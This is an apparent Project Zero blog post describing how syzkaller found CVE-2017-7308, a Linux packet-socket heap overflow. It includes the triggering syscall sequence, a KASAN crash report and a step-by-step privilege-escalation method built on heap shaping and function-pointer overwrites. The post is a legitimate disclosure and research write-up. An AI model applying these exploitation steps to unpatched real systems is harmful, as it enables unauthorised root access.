Google Project Zero

Subscribe to Google Project Zero feed
News and updates from the Project Zero team at Googletavisohttp://www.blogger.com/profile/00625649251729449405noreply@blogger.comBlogger71125
Updated: 58 min 3 sec ago

Exploiting the Linux kernel via packet sockets

Wed, 05/10/2017 - 12:33
Guest blog post, posted by Andrey KonovalovIntroductionLately I’ve been spending some time fuzzing network-related Linux kernel interfaces with syzkaller. Besides the recently discovered vulnerability in DCCP sockets, I also found another one, this time in packet sockets. This post describes how the bug was discovered and how we can exploit it to escalate privileges.
The bug itself (CVE-2017-7308) is a signedness issue, which leads to an exploitable heap-out-of-bounds write. It can be triggered by providing specific parameters to the PACKET_RX_RING option on an AF_PACKET socket with a TPACKET_V3 ring buffer version enabled. As a result the following sanity check in the packet_set_ring() function in net/packet/af_packet.c can be bypassed, which later leads to an out-of-bounds access.
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     (int)(req->tp_block_size -4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)4210                         goto out;
The bug was introduced on Aug 19, 2011 in the commit f6fb8f10 ("af-packet: TPACKET_V3 flexible buffer implementation") together with the TPACKET_V3 implementation. There was an attempt to fix it on Aug 15, 2014 in commit dc808110 ("packet: handle too big packets for PACKET_V3") by adding additional checks, but this was not sufficient, as shown below. The bug was fixed in 2b6867c2 ("net/packet: fix overflow in check for priv area size") on Mar 29, 2017.
The bug affects a kernel if it has AF_PACKET sockets enabled (CONFIG_PACKET=y), which is the case for many Linux kernel distributions. Exploitation requires the CAP_NET_RAW privilege to be able to create such sockets. However it's possible to do that from a user namespace if they are enabled (CONFIG_USER_NS=y) and accessible to unprivileged users.
Since packet sockets are a quite widely used kernel feature, this vulnerability affects a number of popular Linux kernel distributions including Ubuntu and Android. It should be noted, that access to AF_PACKET sockets is expressly disallowed to any untrusted code within Android, although it is available to some privileged components. Updated Ubuntu kernels are already out, Android’s update is scheduled for July.Syzkaller
The bug was found with syzkaller, a coverage guided syscall fuzzer, and KASAN, a dynamic memory error detector. I’m going to provide some details on how syzkaller works and how to use it for fuzzing some kernel interface in case someone decides to try this.
Let’s start with a quick overview of how the syzkaller fuzzer works. Syzkaller is able to generate random programs (sequences of syscalls) based on manually written template descriptions for each syscall. The fuzzer executes these programs and collects code coverage for each of them. Using the coverage information, syzkaller keeps a corpus of programs, which trigger different code paths in the kernel. Whenever a new program triggers a new code path (i.e. gives new coverage), syzkaller adds it to the corpus. Besides generating completely new programs, syzkaller is able to mutate the existing ones from the corpus.
Syzkaller is meant to be used together with dynamic bug detectors like KASAN (detects memory bugs like out-of-bounds and use-after-frees, available upstream since 4.0), KMSAN (detects uses of uninitialized memory, prototype was just released) or KTSAN (detects data races, prototype is available). The idea is that syzkaller stresses the kernel and executes various interesting code paths and the detectors detect and report bugs.
The usual workflow for finding bugs with syzkaller is as follows:
  1. Setup syzkaller and make sure it works. README and wiki provides quite extensive information on how to do that.
  2. Write template descriptions for a particular kernel interface you want to test.
  3. Specify the syscalls that are used in this interface in the syzkaller config.
  4. Run syzkaller until it finds bugs. Usually this happens quite fast for the interfaces, that haven’t been tested with it previously.

Syzkaller uses it’s own declarative language to describe syscall templates. Checkout sys/sys.txt for an example or sys/README.md for the information on the syntax. Here’s an excerpt from the syzkaller descriptions for AF_PACKET sockets that I used to discover the bug:
resource sock_packet[sock]
define ETH_P_ALL_BE htons(ETH_P_ALL)
socket$packet(domain const[AF_PACKET], type flags[packet_socket_type], proto const[ETH_P_ALL_BE]) sock_packet
packet_socket_type = SOCK_RAW, SOCK_DGRAM
setsockopt$packet_rx_ring(fd sock_packet, level const[SOL_PACKET], optname const[PACKET_RX_RING], optval ptr[in, tpacket_req_u], optlen len[optval])setsockopt$packet_tx_ring(fd sock_packet, level const[SOL_PACKET], optname const[PACKET_TX_RING], optval ptr[in, tpacket_req_u], optlen len[optval])
tpacket_req { tp_block_size int32 tp_block_nr int32 tp_frame_size int32 tp_frame_nr int32}
tpacket_req3 { tp_block_size int32 tp_block_nr int32 tp_frame_size int32 tp_frame_nr int32 tp_retire_blk_tov int32 tp_sizeof_priv int32 tp_feature_req_word int32}
tpacket_req_u [ req tpacket_req req3 tpacket_req3] [varlen]
The syntax is mostly self-explanatory. First, we declare a new type sock_packet. This type is inherited from an existing type sock. That way syzkaller will use syscalls which have arguments of type sock on sock_packet sockets as well.
After that, we declare a new syscall socket$packet. The part before the $ sign tells syzkaller what syscall it should use, and the part after the $ sign is used to differentiate between different kinds of the same syscall. This is particularly useful when dealing with syscalls like ioctl. The socket$packet syscall returns a sock_packet socket.
Then setsockopt$packet_rx_ring and setsockopt$packet_tx_ring are declared. These syscalls set the PACKET_RX_RING and PACKET_TX_RING socket options on a sock_packet socket. I’ll talk about these options in details below. Both of them use the tpacket_req_u union as a socket option value. This union has two struct members tpacket_req and tpacket_req3.
Once the descriptions are added, syzkaller can be instructed to fuzz packet-related syscalls specifically. This is what I provided in the syzkaller manager config:
"enable_syscalls": [ "socket$packet", "socketpair$packet", "accept$packet", "accept4$packet", "bind$packet", "connect$packet", "sendto$packet", "recvfrom$packet", "getsockname$packet", "getpeername$packet", "listen", "setsockopt", "getsockopt", "syz_emit_ethernet" ],
After a few minutes of running syzkaller with these descriptions I started getting kernel crashes. Here’s one of the syzkaller programs that triggered the mentioned bug:
mmap(&(0x7f0000000000/0xc8f000)=nil, (0xc8f000), 0x3, 0x32, 0xffffffffffffffff, 0x0)
r0 = socket$packet(0x11, 0x3, 0x300)
setsockopt$packet_int(r0, 0x107, 0xa, &(0x7f000061f000)=0x2, 0x4)
setsockopt$packet_rx_ring(r0, 0x107, 0x5, &(0x7f0000c8b000)=@req3={0x10000, 0x3, 0x10000, 0x3, 0x4, 0xfffffffffffffffe, 0x5}, 0x1c)
And here’s one of the KASAN reports. It should be noted, that since the access is quite far past the block bounds, allocation and deallocation stacks don’t correspond to the overflown object.
==================================================================BUG: KASAN: slab-out-of-bounds in prb_close_block net/packet/af_packet.c:808Write of size 4 at addr ffff880054b70010 by task syz-executor0/30839
CPU: 0 PID: 30839 Comm: syz-executor0 Not tainted 4.11.0-rc2+ #94Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Bochs 01/01/2011Call Trace: __dump_stack lib/dump_stack.c:16 [inline] dump_stack+0x292/0x398 lib/dump_stack.c:52 print_address_description+0x73/0x280 mm/kasan/report.c:246 kasan_report_error mm/kasan/report.c:345 [inline] kasan_report.part.3+0x21f/0x310 mm/kasan/report.c:368 kasan_report mm/kasan/report.c:393 [inline] __asan_report_store4_noabort+0x2c/0x30 mm/kasan/report.c:393 prb_close_block net/packet/af_packet.c:808 [inline] prb_retire_current_block+0x6ed/0x820 net/packet/af_packet.c:970 __packet_lookup_frame_in_block net/packet/af_packet.c:1093 [inline] packet_current_rx_frame net/packet/af_packet.c:1122 [inline] tpacket_rcv+0x9c1/0x3750 net/packet/af_packet.c:2236 packet_rcv_fanout+0x527/0x810 net/packet/af_packet.c:1493 deliver_skb net/core/dev.c:1834 [inline] __netif_receive_skb_core+0x1cff/0x3400 net/core/dev.c:4117 __netif_receive_skb+0x2a/0x170 net/core/dev.c:4244 netif_receive_skb_internal+0x1d6/0x430 net/core/dev.c:4272 netif_receive_skb+0xae/0x3b0 net/core/dev.c:4296 tun_rx_batched.isra.39+0x5e5/0x8c0 drivers/net/tun.c:1155 tun_get_user+0x100d/0x2e20 drivers/net/tun.c:1327 tun_chr_write_iter+0xd8/0x190 drivers/net/tun.c:1353 call_write_iter include/linux/fs.h:1733 [inline] new_sync_write fs/read_write.c:497 [inline] __vfs_write+0x483/0x760 fs/read_write.c:510 vfs_write+0x187/0x530 fs/read_write.c:558 SYSC_write fs/read_write.c:605 [inline] SyS_write+0xfb/0x230 fs/read_write.c:597 entry_SYSCALL_64_fastpath+0x1f/0xc2RIP: 0033:0x40b031RSP: 002b:00007faacbc3cb50 EFLAGS: 00000293 ORIG_RAX: 0000000000000001RAX: ffffffffffffffda RBX: 000000000000002a RCX: 000000000040b031RDX: 000000000000002a RSI: 0000000020002fd6 RDI: 0000000000000015RBP: 00000000006e2960 R08: 0000000000000000 R09: 0000000000000000R10: 0000000000000000 R11: 0000000000000293 R12: 0000000000708000R13: 000000000000002a R14: 0000000020002fd6 R15: 0000000000000000
Allocated by task 30534: save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59 save_stack+0x43/0xd0 mm/kasan/kasan.c:513 set_track mm/kasan/kasan.c:525 [inline] kasan_kmalloc+0xad/0xe0 mm/kasan/kasan.c:617 kasan_slab_alloc+0x12/0x20 mm/kasan/kasan.c:555 slab_post_alloc_hook mm/slab.h:456 [inline] slab_alloc_node mm/slub.c:2720 [inline] slab_alloc mm/slub.c:2728 [inline] kmem_cache_alloc+0x1af/0x250 mm/slub.c:2733 getname_flags+0xcb/0x580 fs/namei.c:137 getname+0x19/0x20 fs/namei.c:208 do_sys_open+0x2ff/0x720 fs/open.c:1045 SYSC_open fs/open.c:1069 [inline] SyS_open+0x2d/0x40 fs/open.c:1064 entry_SYSCALL_64_fastpath+0x1f/0xc2
Freed by task 30534: save_stack_trace+0x16/0x20 arch/x86/kernel/stacktrace.c:59 save_stack+0x43/0xd0 mm/kasan/kasan.c:513 set_track mm/kasan/kasan.c:525 [inline] kasan_slab_free+0x72/0xc0 mm/kasan/kasan.c:590 slab_free_hook mm/slub.c:1358 [inline] slab_free_freelist_hook mm/slub.c:1381 [inline] slab_free mm/slub.c:2963 [inline] kmem_cache_free+0xb5/0x2d0 mm/slub.c:2985 putname+0xee/0x130 fs/namei.c:257 do_sys_open+0x336/0x720 fs/open.c:1060 SYSC_open fs/open.c:1069 [inline] SyS_open+0x2d/0x40 fs/open.c:1064 entry_SYSCALL_64_fastpath+0x1f/0xc2
Object at ffff880054b70040 belongs to cache names_cache of size 4096The buggy address belongs to the page:page:ffffea000152dc00 count:1 mapcount:0 mapping:          (null) index:0x0 compound_mapcount: 0flags: 0x500000000008100(slab|head)raw: 0500000000008100 0000000000000000 0000000000000000 0000000100070007raw: ffffea0001549a20 ffffea0001b3cc20 ffff88003eb44f40 0000000000000000page dumped because: kasan: bad access detected
Memory state around the buggy address: ffff880054b6ff00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ffff880054b6ff80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00>ffff880054b70000: fc fc fc fc fc fc fc fc fb fb fb fb fb fb fb fb                         ^ ffff880054b70080: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb ffff880054b70100: fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb fb==================================================================
You can find more details about syzkaller in it’s repository and more details about KASAN in the kernel documentation. If you decide to try syzkaller or KASAN and run into any troubles drop an email to syzkaller@googlegroups.com or to kasan-dev@googlegroups.com.Introduction to AF_PACKET sockets
To better understand the bug, the vulnerability it leads to and how to exploit it, we need to understand what AF_PACKET sockets are and how they are implemented in the kernel.
Overview
AF_PACKET sockets allow users to send or receive packets on the device driver level. This for example lets them to implement their own protocol on top of the physical layer or to sniff packets including Ethernet and higher levels protocol headers. To create an AF_PACKET socket a process must have the CAP_NET_RAW capability in the user namespace that governs its network namespace. More details can be found in the packet sockets documentation. It should be noted that if a kernel has unprivileged user namespaces enabled, then an unprivileged user is able to create packet sockets.
To send and receive packets on a packet socket, a process can use the send and recv syscalls. However, packet sockets provide a way to do this faster by using a ring buffer, that’s shared between the kernel and the userspace. A ring buffer can be created via the PACKET_TX_RING and PACKET_RX_RING socket options. The ring buffer can then be mmaped by the user and the packet data can then be read or written directly to it.
There are a few different variants of the way the ring buffer is handled by the kernel. This variant can be chosen by the user by using the PACKET_VERSION socket option. The difference between ring buffer versions can be found in the kernel documentation (search for “TPACKET versions”).
One of the widely known users of AF_PACKET sockets is the tcpdump utility. This is roughly what happens when tcpdump is used to sniff all packets on a particular interface:
# strace tcpdump -i eth0...socket(PF_PACKET, SOCK_RAW, 768)        = 3...bind(3, {sa_family=AF_PACKET, proto=0x03, if2, pkttype=PACKET_HOST, addr(0)={0, }, 20) = 0...setsockopt(3, SOL_PACKET, PACKET_VERSION, [1], 4) = 0...setsockopt(3, SOL_PACKET, PACKET_RX_RING, {block_size=131072, block_nr=31, frame_size=65616, frame_nr=31}, 16) = 0...mmap(NULL, 4063232, PROT_READ|PROT_WRITE, MAP_SHARED, 3, 0) = 0x7f73a6817000...
This sequence of syscalls corresponds to the following actions:
  1. A socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL)) is created.
  2. The socket is bound to the eth0 interface.
  3. Ring buffer version is set to TPACKET_V2 via the PACKET_VERSION socket option.
  4. A ring buffer is created via the PACKET_RX_RING socket option.
  5. The ring buffer is mmapped in the userspace.

After that the kernel will start putting all packets coming through the eth0 interface in the ring buffer and tcpdump will read them from the mmapped region in the userspace.


Ring buffers
Let’s see how to use ring buffers for packet sockets. For consistency all of the kernel code snippets below will come from the Linux kernel 4.8. This is the version the latest Ubuntu 16.04.2 kernel is based on.
The existing documentation mostly focuses on TPACKET_V1 and TPACKET_V2 ring buffer versions. Since the mentioned bug only affects the TPACKET_V3 version, I’m going to assume that we deal with that particular version for the rest of the post. Also I’m going to mostly focus on PACKET_RX_RING ignoring PACKET_TX_RING.
A ring buffer is a memory region used to store packets. Each packet is stored in a separate frame. Frames are grouped into blocks. In TPACKET_V3 ring buffers frame size is not fixed and can have arbitrary value as long as a frame fits into a block.
To create a TPACKET_V3 ring buffer via the PACKET_RX_RING socket option a user must provide the exact parameters for the ring buffer. These parameters are passed to the setsockopt call via a pointer to a request struct called tpacket_req3, which is defined as:
274 struct tpacket_req3 {275         unsigned int    tp_block_size;  /* Minimal size of contiguous block */276         unsigned int    tp_block_nr;    /* Number of blocks */277         unsigned int    tp_frame_size;  /* Size of frame */278         unsigned int    tp_frame_nr;    /* Total number of frames */279         unsigned int    tp_retire_blk_tov; /* timeout in msecs */280         unsigned int    tp_sizeof_priv; /* offset to private data area */281         unsigned int    tp_feature_req_word;282 };
Here’s what each field means in the tpacket_req3 struct:
  1. tp_block_size - the size of each block.
  2. tp_block_nr - the number of blocks.
  3. tp_frame_size - the size of each frame, ignored for TPACKET_V3.
  4. tp_frame_nr - the number of frames, ignored for TPACKET_V3.
  5. tp_retire_blk_tov - timeout after which a block is retired, even if it’s not fully filled with data (see below).
  6. tp_sizeof_priv - the size of per-block private area. This area can be used by a user to store arbitrary information associated with each block.
  7. tp_feature_req_word - a set of flags (actually just one at the moment), which allows to enable some additional functionality.

Each block has an associated header, which is stored at the very beginning of the memory area allocated for the block. The block header struct is called tpacket_block_desc and has a block_status field, which indicates whether the block is currently being used by the kernel or available to the user. The usual workflow is that the kernel stores packets into a block until it’s full and then sets block_status to TP_STATUS_USER. The user then reads required data from the block and releases it back to the kernel by setting block_status to TP_STATUS_KERNEL.
186 struct tpacket_hdr_v1 {187         __u32   block_status;188         __u32   num_pkts;189         __u32   offset_to_first_pkt;...233 };234 235 union tpacket_bd_header_u {236         struct tpacket_hdr_v1 bh1;237 };238 239 struct tpacket_block_desc {240         __u32 version;241         __u32 offset_to_priv;242         union tpacket_bd_header_u hdr;243 };
Each frame also has an associated header described by the struct tpacket3_hdr. The tp_next_offset field points to the next frame within the same block.
162 struct tpacket3_hdr {163         __u32 tp_next_offset;...176 };
When a block is fully filled with data (a new packet doesn’t fit into the remaining space), it’s closed and released to userspace or “retired” by the kernel. Since the user usually wants to see packets as soon as possible, the kernel can release a block even if it’s not filled with data completely. This is done by setting up a timer that retires current block with a timeout controlled by the tp_retire_blk_tov parameter.
There’s also a way so specify per-block private area, which the kernel won’t touch and the user can use to store any information associated with a block. The size of this area is passed via the tp_sizeof_priv parameter.
If you’d like to better understand how a userspace program can use TPACKET_V3 ring buffer you can read the example provided in the documentation (search for “TPACKET_V3 example“).

Implementation of AF_PACKET sockets
Let’s take a quick look at how some of this is implemented in the kernel.
Struct definitions
Whenever a packet socket is created, an associated packet_sock struct is allocated in the kernel:
103 struct packet_sock {...105         struct sock             sk;...108         struct packet_ring_buffer       rx_ring;109         struct packet_ring_buffer       tx_ring;...123         enum tpacket_versions   tp_version;...130         int                     (*xmit)(struct sk_buff *skb);...132 };
The tp_version field in this struct holds the ring buffer version, which in our case is set to TPACKET_V3 by a PACKET_VERSION setsockopt call. The rx_ring and tx_ring fields describe the receive and transmit ring buffers in case they are created via PACKET_RX_RING and PACKET_TX_RING setsockopt calls. These two fields have type packet_ring_buffer, which is defined as:
56 struct packet_ring_buffer {57         struct pgv              *pg_vec;...70         struct tpacket_kbdq_core        prb_bdqc;71 };
The pg_vec field is a pointer to an array of pgv structs, each of which holds a reference to a block. Blocks are actually allocated separately, not as a one contiguous memory region.
52 struct pgv {53         char *buffer;54 };


The prb_bdqc field is of type tpacket_kbdq_core and its fields describe the current state of the ring buffer:
14 struct tpacket_kbdq_core {...21         unsigned short  blk_sizeof_priv;...36         char            *nxt_offset;...49         struct timer_list retire_blk_timer;50 };
The blk_sizeof_priv fields contains the size of the per-block private area. The nxt_offset field points inside the currently active block and shows where the next packet should be saved. The retire_blk_timer field has type timer_list and describes the timer which retires current block on timeout.
12 struct timer_list {...17         struct hlist_node       entry;18         unsigned long           expires;19         void                    (*function)(unsigned long);20         unsigned long           data;...31 };
Ring buffer setup
The kernel uses the packet_setsockopt() function to handle setting socket options for packet sockets. When the PACKET_VERSION socket option is used, the kernel sets po->tp_version to the provided value.
With the PACKET_RX_RING socket option a receive ring buffer is created. Internally it’s done by the packet_set_ring() function. This function does a lot of things, so I’ll just show the important parts. First, packet_set_ring() performs a bunch of sanity checks on the provided ring buffer parameters:
4202                 err = -EINVAL;4203                 if (unlikely((int)req->tp_block_size <= 0))4204                         goto out;4205                 if (unlikely(!PAGE_ALIGNED(req->tp_block_size)))4206                         goto out;4207                 if (po->tp_version >= TPACKET_V3 &&4208                     (int)(req->tp_block_size -4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)4210                         goto out;4211                 if (unlikely(req->tp_frame_size < po->tp_hdrlen +4212                                         po->tp_reserve))4213                         goto out;4214                 if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))4215                         goto out;4216 4217                 rb->frames_per_block = req->tp_block_size / req->tp_frame_size;4218                 if (unlikely(rb->frames_per_block == 0))4219                         goto out;4220                 if (unlikely((rb->frames_per_block * req->tp_block_nr) !=4221                                         req->tp_frame_nr))4222                         goto out;
Then, it allocates the ring buffer blocks:
4224                 err = -ENOMEM;4225                 order = get_order(req->tp_block_size);4226                 pg_vec = alloc_pg_vec(req, order);4227                 if (unlikely(!pg_vec))4228                         goto out;
It should be noted that alloc_pg_vec() uses the kernel page allocator to allocate blocks (we’ll use this in the exploit):
4104 static char *alloc_one_pg_vec_page(unsigned long order)4105 {...4110         buffer = (char *) __get_free_pages(gfp_flags, order);4111         if (buffer)4112                 return buffer;...4127 }4128 4129 static struct pgv *alloc_pg_vec(struct tpacket_req *req, int order)4130 {...4139         for (i = 0; i < block_nr; i++) {4140                 pg_vec[i].buffer = alloc_one_pg_vec_page(order);...4143         }...4152 }
Finally, packet_set_ring() calls init_prb_bdqc(), which performs some additional steps to set up a TPACKET_V3 receive ring buffer specifically:
4229                 switch (po->tp_version) {4230                 case TPACKET_V3:...4234                         if (!tx_ring)4235                                 init_prb_bdqc(po, rb, pg_vec, req_u);4236                         break;4237                 default:4238                         break;4239                 }
The init_prb_bdqc() function copies provided ring buffer parameters to the prb_bdqc field of the ring buffer struct, calculates some other parameters based on them, sets up the block retire timer and calls prb_open_block() to initialize the first block:
604 static void init_prb_bdqc(struct packet_sock *po,605                         struct packet_ring_buffer *rb,606                         struct pgv *pg_vec,607                         union tpacket_req_u *req_u)608 {609         struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);610         struct tpacket_block_desc *pbd;...616         pbd = (struct tpacket_block_desc *)pg_vec[0].buffer;617         p1->pkblk_start = pg_vec[0].buffer;618         p1->kblk_size = req_u->req3.tp_block_size;...630         p1->blk_sizeof_priv = req_u->req3.tp_sizeof_priv;631 632         p1->max_frame_len = p1->kblk_size - BLK_PLUS_PRIV(p1->blk_sizeof_priv);633         prb_init_ft_ops(p1, req_u);634         prb_setup_retire_blk_timer(po);635         prb_open_block(p1, pbd);636 }
On of the things that the prb_open_block() function does is it sets the nxt_offset field of the tpacket_kbdq_core struct to point right after the per-block private area:
841 static void prb_open_block(struct tpacket_kbdq_core *pkc1,842         struct tpacket_block_desc *pbd1)843 {...862         pkc1->pkblk_start = (char *)pbd1;863         pkc1->nxt_offset = pkc1->pkblk_start + BLK_PLUS_PRIV(pkc1->blk_sizeof_priv);...876 }
Packet reception
Whenever a new packet is received, the kernel is supposed to save it into the ring buffer. The key function here is __packet_lookup_frame_in_block(), which does the following:
  1. Checks whether the currently active block has enough space for the packet.
  2. If yes, saves the packet to the current block and returns.
  3. If no, dispatches the next block and saves the packet there.

1041 static void *__packet_lookup_frame_in_block(struct packet_sock *po,1042                                             struct sk_buff *skb,1043                                                 int status,1044                                             unsigned int len1045                                             )1046 {1047         struct tpacket_kbdq_core *pkc;1048         struct tpacket_block_desc *pbd;1049         char *curr, *end;1050 1051         pkc = GET_PBDQC_FROM_RB(&po->rx_ring);1052         pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);...1075         curr = pkc->nxt_offset;1076         pkc->skb = skb;1077         end = (char *)pbd + pkc->kblk_size;1078 1079         /* first try the current block */1080         if (curr+TOTAL_PKT_LEN_INCL_ALIGN(len) < end) {1081                 prb_fill_curr_block(curr, pkc, pbd, len);1082                 return (void *)curr;1083         }1084 1085         /* Ok, close the current block */1086         prb_retire_current_block(pkc, po, 0);1087 1088         /* Now, try to dispatch the next block */1089         curr = (char *)prb_dispatch_next_block(pkc, po);1090         if (curr) {1091                 pbd = GET_CURR_PBLOCK_DESC_FROM_CORE(pkc);1092                 prb_fill_curr_block(curr, pkc, pbd, len);1093                 return (void *)curr;1094         }...1101 }Vulnerability
Bug
Let’s look closely at the following check from packet_set_ring():
4207                 if (po->tp_version >= TPACKET_V3 &&4208                     (int)(req->tp_block_size -4209                           BLK_PLUS_PRIV(req_u->req3.tp_sizeof_priv)) <= 0)4210                         goto out;
This is supposed to ensure that the length of the block header together with the per-block private data is not bigger than the size of the block. Which totally makes sense, otherwise we won’t have enough space in the block for them let alone the packet data.
However turns out this check can be bypassed. In case req_u->req3.tp_sizeof_priv has the higher bit set, casting the expression to int results in a big positive value instead of negative. To illustrate this behavior:
A = req->tp_block_size = 4096 = 0x1000B = req_u->req3.tp_sizeof_priv = (1 << 31) + 4096 = 0x80001000BLK_PLUS_PRIV(B) = (1 << 31) + 4096 + 48 = 0x80001030A - BLK_PLUS_PRIV(B) = 0x1000 - 0x80001030 = 0x7fffffd0(int)0x7fffffd0 = 0x7fffffd0 > 0
Later, when req_u->req3.tp_sizeof_priv is copied to p1->blk_sizeof_priv in init_prb_bdqc() (see the snippet above), it’s clamped to two lower bytes, since the type of the latter is unsigned short. So this bug basically allows us to set the blk_sizeof_priv of the tpacket_kbdq_core struct to arbitrary value bypassing all sanity checks.
Consequences
If we search through the net/packet/af_packet.c source looking for blk_sizeof_priv usage, we’ll find that it’s being used in the two following places.
The first one is in init_prb_bdqc() right after it gets assigned (see the code snippet above) to set max_frame_len. The value of p1->max_frame_len denotes the maximum size of a frame that can be saved into a block. Since we control p1->blk_sizeof_priv, we can make BLK_PLUS_PRIV(p1->blk_sizeof_priv) bigger than p1->kblk_size. This will result in p1->max_frame_len having a huge value, higher than the size of a block. This allows us to bypass the size check when a frame is being copied into a block, thus causing a kernel heap out-of-bounds write.
That’s not all. Another user of blk_sizeof_priv is prb_open_block(), which initializes a block (the code snippet is above as well). There pkc1->nxt_offset denotes the address, where the kernel will write a new packet when it’s being received. The kernel doesn’t intend to overwrite the block header and per-block private data, so it makes this address to point right after them. Since we control blk_sizeof_priv, we can control the lowest two bytes of nxt_offset. This allows us to control offset of the out-of-bounds write.
To sum up, this bug leads to a kernel heap out-of-bounds write of controlled maximum size and controlled offset up to about 64k bytes. Exploitation
Let’s see how we can exploit this vulnerability. I’m going to be targeting x86-64 Ubuntu 16.04.2 with 4.8.0-41-generic kernel version with KASLR, SMEP and SMAP enabled. Ubuntu kernel has user namespaces available to unprivileged users (CONFIG_USER_NS=y and no restrictions on it’s usage), so the bug can be exploited to gain root privileges by an unprivileged user. All of the exploitation steps below are performed from within a user namespace.
The Linux kernel has support for a few hardening features that make exploitation more difficult. KASLR (Kernel Address Space Layout Randomization) puts the kernel text at a random offset to make jumping to a particular fixed address useless. SMEP (Supervisor Mode Execution Protection) causes an oops whenever the kernel tries to execute code from the userspace memory and SMAP (Supervisor Mode Access Prevention) does the same whenever the kernel tries to access the userspace memory directly.
Shaping heap
The idea of the exploit is to use the heap out-of-bounds write to overwrite a function pointer in the memory adjacent to the overflown block. For that we need to specifically shape the heap, so some object with a triggerable function pointer is placed right after a ring buffer block. I chose the already mentioned packet_sock struct to be this object. We need to find a way to make the kernel allocate a ring buffer block and a packet_sock struct one next to the other.
As I mentioned above, ring buffer blocks are allocated with the kernel page allocator (buddy allocator). It allows to allocate blocks of 2^n contiguous memory pages. The allocator keeps a freelist of such block for each n and returns the freelist head when a block is requested. If the freelist for some n is empty, it finds the first m > n, for which the freelist is not empty and splits it in halves until the required size is reached. Therefore, if we start repeatedly allocating blocks of size 2^n, at some point they will start coming from one high order memory block being split and they will be adjacent each one to the next.
A packet_sock is allocated via the kmalloc() function by the slab allocator. The slab allocator is mostly used to allocate objects of a smaller-than-one-page size. It uses the page allocator to allocate a big block of memory and splits this block into smaller objects. The big blocks are called slabs, hence the name of the allocator. A set of slabs together with their current state and a set of operations like “allocate an object” and “free an object” is called a cache. The slab allocator creates a set of general purpose caches for objects of size 2^n. Whenever kmalloc(size) is called, the slab allocator rounds size up to the nearest power of 2 and uses the cache of that size.
Since the kernel uses kmalloc() all the time, if we try to allocate an object it will most likely come from one of the slabs already created during previous usage. However, if we start allocating objects of the same size, at some point the slab allocator will run out of slabs for this size and will have to allocate another one via the page allocator.
The size of a newly allocated slab depends on the size of objects this slab is meant for. The size of the packet_sock struct is ~1920 and 1024 < 1920 <= 2048, which means that it’ll be rounded to 2048 and the kmalloc-2048 cache will be used. Turns out, for this particular cache the SLUB allocator (which is the kind of slab allocator used in Ubuntu) uses slabs of size 0x8000. So whenever the allocator runs out of slabs for the kmalloc-2048 cache, it allocates 0x8000 bytes with the page allocator.
Keeping all that in mind, this is how we can allocate a kmalloc-2048 slab next to a ring buffer block:
  1. Allocate a lot (512 worked for me) of objects of size 2048 to fill currently existing slabs in the kmalloc-2048 cache. To do that we can create a bunch of packet sockets to cause allocation of packet_sock structs.
  2. Allocate a lot (1024 worked for me) page blocks of size 0x8000 to drain the page allocator freelists and cause some high-order page block to be split. To do that we can create another packet socket and attach a ring buffer with 1024 blocks of size 0x8000.
  3. Create a packet socket and attach a ring buffer with blocks of size 0x8000. The last one of these blocks (I’m using 2 blocks, the reason is explained below) is the one we’re going to overflow.
  4. Create a bunch of packet sockets to allocate packet_sock structs and cause an allocation of at least one new slab.
This way we can shape the heap in the following way:


The exact number of allocations to drain freelists and shape the heap the way we want might be different for different setups and depend on the memory usage activity. The numbers above are for a mostly idle Ubuntu machine.
Controlling the overwrite
Above I explained that the bug results in a write of a controlled maximum size at a controlled offset out of the bounds of a ring buffer block. Turns out not only we can control the maximum size and offset, we can actually control the exact data (and it’s size) that’s being written. Since the data that’s being stored in a ring buffer block is the packet that’s passing through a particular network interface, we can manually send packets with arbitrary content on a raw socket through the loopback interface. If we’re doing that in an isolated network namespace no external traffic will interfere.
There are a few caveats though.
First, it seems that the size of a packet must be at least 14 bytes (12 bytes for two mac addresses and 2 bytes for the EtherType apparently) for it to be passed to the packet socket layer. That means that we have to overwrite at least 14 bytes. The data in the packet itself can be arbitrary.
Then, the lowest 3 bits of nxt_offset always have the value of 2 due to the alignment. That means that we can’t start overwriting at an 8-byte aligned offset.
Besides that, when a packet is being received and saved into a block, the kernel updates some fields in the block and frame headers. If we point nxt_offset to some particular offset we want to overwrite, some data where the block and frames headers end up will probably be corrupted.
Another issue is that if we make nxt_offset point past the block end, the first block will be immediately closed when the first packet is being received, since the kernel will (correctly) decide that there’s no space left in the first block (see the __packet_lookup_frame_in_block() snippet). This is not really an issue, since we can create a ring buffer with 2 blocks. The first one will be closed, the second one will be overflown.
Executing code
Now, we need to figure out which function pointers to overwrite. There are a few of function pointers fields in the packet_sock struct, but I ended up using the following two:
  1. packet_sock->xmit
  2. packet_sock->rx_ring->prb_bdqc->retire_blk_timer->func

The first one is called whenever a user tries to send a packet via a packet socket. The usual way to elevate privileges to root is to execute the commit_creds(prepare_kernel_cred(0)) payload in a process context. The xmit pointer is called from a process context, which means we can simply point it to the executable memory region, which contains the payload.
To do that we need to put our payload to some executable memory region. One of the possible ways for that is to put the payload in the userspace, either by mmapping an executable memory page or by just defining a global function within our exploit program. However, SMEP & SMAP will prevent the kernel from accessing and executing user memory directly, so we need to deal with them first.
For that I used the retire_blk_timer field (the same field used by Philip Pettersson in his CVE-2016-8655 exploit). It contains a function pointer that’s triggered whenever the retire timer times out. During normal packet socket operation, retire_blk_timer->func points to prb_retire_rx_blk_timer_expired() and it’s called with retire_blk_timer->data as an argument, which contains the address of the packet_sock struct. Since we can overwrite the data field along with the func field, we get a very nice func(data) primitive.
